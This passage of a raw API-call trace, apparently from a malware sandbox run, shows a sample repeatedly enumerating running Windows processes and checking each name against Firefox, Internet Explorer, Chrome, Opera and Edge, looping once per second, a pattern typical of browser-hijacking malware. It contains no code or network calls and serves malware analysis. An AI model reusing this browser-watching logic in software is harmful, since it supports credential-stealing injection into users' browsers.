lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0168.038] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0168.038] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.038] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0168.039] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0168.039] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0168.039] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0168.039] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0168.039] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.039] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.039] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0168.039] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0168.039] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0168.039] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0168.039] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.040] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0168.040] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0168.040] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0168.040] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0168.040] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0168.040] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.040] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.041] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0168.041] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0168.041] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0168.041] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0168.041] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.041] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0168.041] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0168.041] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0168.041] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0168.041] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0168.041] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.041] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0168.042] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0168.042] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0168.042] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0168.042] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0168.042] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.042] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0168.042] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0168.043] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0168.043] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0168.043] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0168.043] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.043] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0168.043] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0168.043] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0168.043] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0168.043] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0168.043] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.043] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0168.044] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0168.044] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0168.044] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0168.044] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0168.044] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.044] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0168.044] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0168.044] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0168.045] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0168.045] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0168.045] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.045] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0168.045] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0168.045] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0168.045] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0168.045] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0168.045] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.045] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0168.046] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0168.046] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0168.046] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0168.046] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0168.046] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.046] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0168.046] CloseHandle (hObject=0xe8) returned 1 [0168.046] Sleep (dwMilliseconds=0x3e8) [0169.160] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0169.163] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.163] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0169.163] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0169.163] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0169.163] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0169.164] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0169.164] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0169.164] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0169.164] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0169.164] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0169.164] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0169.164] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0169.164] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0169.165] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0169.165] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0169.165] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0169.165] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0169.165] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.165] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0169.165] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0169.165] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0169.165] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0169.165] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0169.165] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.165] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0169.166] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0169.166] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0169.166] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0169.166] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0169.166] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.166] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0169.166] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0169.166] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0169.167] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0169.167] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0169.167] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.167] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0169.167] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0169.167] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0169.167] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0169.167] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0169.167] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.167] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0169.168] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0169.168] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0169.168] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0169.168] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0169.168] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.168] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0169.168] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0169.168] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0169.168] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0169.168] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0169.168] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.168] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0169.169] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0169.169] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0169.169] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0169.169] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0169.169] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.169] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.170] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.170] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.170] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.170] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0169.170] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.170] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.170] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.170] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.170] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.170] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0169.170] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.170] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.171] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.171] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.171] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.171] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0169.171] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.171] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.171] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.171] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.171] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.172] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0169.172] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.172] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.172] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.172] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.172] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.172] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0169.172] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.172] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0169.173] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0169.173] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0169.173] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0169.173] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0169.173] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.173] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.173] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.173] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.173] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.173] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0169.173] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.173] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.174] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.174] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.174] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.174] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0169.174] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.174] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0169.175] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0169.175] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0169.175] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0169.175] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0169.175] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.175] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0169.175] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0169.175] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0169.175] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0169.175] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0169.175] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.175] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0169.176] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0169.176] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0169.176] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0169.176] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0169.176] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.176] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.177] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.177] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.177] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.177] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0169.177] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.177] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0169.177] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0169.177] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0169.177] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0169.177] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0169.177] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.177] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0169.178] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0169.178] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0169.178] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0169.178] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0169.178] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.178] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: 